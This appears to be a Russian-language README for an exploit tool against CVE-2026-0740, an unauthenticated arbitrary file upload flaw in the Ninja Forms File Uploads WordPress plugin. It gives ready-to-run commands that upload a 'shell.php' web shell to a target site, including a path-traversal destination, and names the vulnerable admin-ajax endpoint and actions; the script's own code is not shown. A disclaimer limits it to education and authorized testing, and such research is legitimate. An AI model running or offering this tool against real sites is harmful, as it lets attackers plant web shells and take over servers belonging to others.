
Ninja Forms File Uploads <= 3.3.26 - Неаутентифицированная произвольная загрузка файлов
CVE-2026-0740 — это уязвимость произвольной загрузки файлов без аутентификации, затрагивающая:
Ninja Forms File Uploads ≤ 3.3.26 (плагин WordPress)
Эта уязвимость позволяет злоумышленникам загружать произвольные файлы на сервер без аутентификации, что потенциально может привести к удалённому выполнению кода (RCE).
Этот проект предоставляется только в образовательных целях и для авторизованного тестирования безопасности.
Установите зависимости:
pip install httpx httpx-socks
python3 CVE-2026-0740.py -t http://target.com -f shell.php
| Аргумент | Описание |
|---|---|
-t, --target | URL цели |
-f, --file | Файл для загрузки |
-d, --dest | Конечный путь (path traversal) |
-x, --proxy | Прокси SOCKS5 |
-H, --headers | Пользовательские заголовки |
--timeout | Таймаут запроса |
--no-color | Отключить цветной вывод |
-q, --quiet | Тихий режим |
--verify-ssl | Включить проверку SSL |
python3 CVE-2026-0740.py \
-t https://victim.com \
-f shell.php \
-d ../../../../shell.php
admin-ajax.phpПлагин: Ninja Forms File Uploads
Эндпоинт: /wp-admin/admin-ajax.php
Действия:
nf_fu_get_new_noncenf_fu_upload/wp-content/uploads/Этот проект распространяется под лицензией MIT — подробности см. в файле LICENSE.
Пул-реквесты приветствуются. Для существенных изменений сначала откройте issue, чтобы обсудить, что вы хотите изменить.